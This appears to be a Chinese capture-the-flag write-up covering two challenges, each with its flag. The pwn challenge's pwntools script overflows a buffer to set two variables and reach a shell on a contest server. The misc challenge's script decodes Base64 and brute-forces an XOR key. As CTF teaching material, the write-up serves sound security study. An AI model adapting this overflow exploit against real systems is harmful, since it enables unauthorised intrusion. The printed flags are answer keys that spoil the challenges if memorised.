护网临时工

pwn

gettingstart

flag{4281a86e5b9ab0ae7940f38be574dc52}

IDA反编译,发现0x7FFFFFFFFFFFFFFFLL == v7 && 0.1 == v8时可以执行system("bin/sh")。

read(0, &buf, 0x28uLL)读入0x28个字节,会依次覆盖buf、v5-v8。v5v6 随便填,v7就写0x7FFFFFFFFFFFFFFF。v8double型的0.1,自己写一个给double赋值0.1C程序,用GDB得到0.1double型在内存中的形式0x3fb999999999999a写进去。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
# io = process("./task_gettingStart_ktQeERc")
io = remote("49.4.78.170", 31070)

payload1 = 'a' * 24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3fb999999999999a)
print("--------------")
print(p64(0x7FFFFFFFFFFFFFFF))
print(p64(0x3fb999999999999a))
print("--------------")
io.recvuntil("you.\n")
io.sendline(payload1)
io.interactive()
io.close()

misc

迟来的签到题

flag{2F64B7656E77E0A0743C02ECAE9E2513}

txt中乱码最后一个有等号,推测是Base64。解码后仍是乱码,提示xor,让每一位和一个数异或,爆破在结果中找符合flag形式的提交。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64

mess = b"AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs="
aft = base64.b64decode(mess)
aft = str(aft, encoding = "utf8")

print(aft)
for i in range(100, 200):
    for j in aft:
        print(chr(i^ord(j)), end='')
    print()